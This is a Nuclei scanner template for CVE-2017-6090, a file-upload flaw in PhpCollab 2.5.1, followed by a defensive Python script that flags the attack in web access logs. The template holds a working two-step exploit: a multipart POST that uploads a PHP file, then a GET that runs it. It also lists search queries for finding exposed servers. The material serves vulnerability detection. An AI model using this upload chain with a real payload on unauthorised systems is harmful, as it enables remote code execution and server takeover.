PhpColl 2.5.1 Arbitrary File Upload
ID: CVE-2017-6090
Severity: high
Author: pikpikcu
Tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
Description
PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
YAML Source
id: CVE-2017-6090

info:
  name: PhpColl 2.5.1 Arbitrary File Upload
  author: pikpikcu
  severity: high
  description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.
  reference:
    - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-6090
    - https://www.exploit-db.com/exploits/42934/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2017-6090
    cwe-id: CWE-434
    epss-score: 0.97204
    epss-percentile: 0.99825
    cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: phpcollab
    product: phpcollab
    shodan-query:
      - http.title:"PhpCollab"
      - http.title:"phpcollab"
    fofa-query: title="phpcollab"
    google-query: intitle:"phpcollab"
  tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
variables:
  string: "CVE-2017-6090"

http:
  - raw:
      - |
        POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137

        -----------------------------154934846911423734231554128137
        Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        <?php echo md5("{{string}}");unlink(__FILE__);?>

        -----------------------------154934846911423734231554128137--
      - |
        GET /logos_clients/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e3a4dc556c6924d836c7e5146d67eed6a1247fb1f159be53b8ff6a304c60dbac02201ab3ebee860f4023c6abc6b08c0f0f0d3c780de36e70514a9a4b481f03477e30:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-6090.yaml"
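
A defender-side counterpart to the template's two requests, added here as an example (it is not part of the original template or of Nuclei): a Python pass over web access logs that flags requests for executable files under logos_clients/ and records whether the same client earlier posted to clients/editclient.php with action=update. The combined log format, the extension list, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions a PHP-enabled server may execute (assumption; match your handler config).
EXECUTABLE_EXT = (".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar")

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_then_execute(lines):
    """Flag requests for executable files under logos_clients/ and note whether
    the same client IP posted to editclient.php?action=update earlier in the log."""
    uploaders = set()
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        path = url.path.lower()
        if (m["method"] == "POST" and path.endswith("/clients/editclient.php")
                and parse_qs(url.query).get("action") == ["update"]):
            uploaders.add(m["ip"])
        elif "/logos_clients/" in path and path.endswith(EXECUTABLE_EXT):
            findings.append({
                "ip": m["ip"], "time": m["ts"], "path": url.path,
                "status": int(m["status"]),
                "preceded_by_upload": m["ip"] in uploaders,
            })
    return findings

# Constructed sample log lines (documentation IP ranges, not from a real system).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "POST /clients/editclient.php?id=abc&action=update HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /logos_clients/abc.php HTTP/1.1" 200 32 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:14:01:02 +0000] "GET /logos_clients/1.png HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:14:02:10 +0000] "GET /logos_clients/old.phtml HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_then_execute(SAMPLE_LOG):
        print(finding)
```

A 200 response with preceded_by_upload set is the pattern the template's matchers rely on; a 404 on an executable path under logos_clients/ is still worth reviewing as a probe.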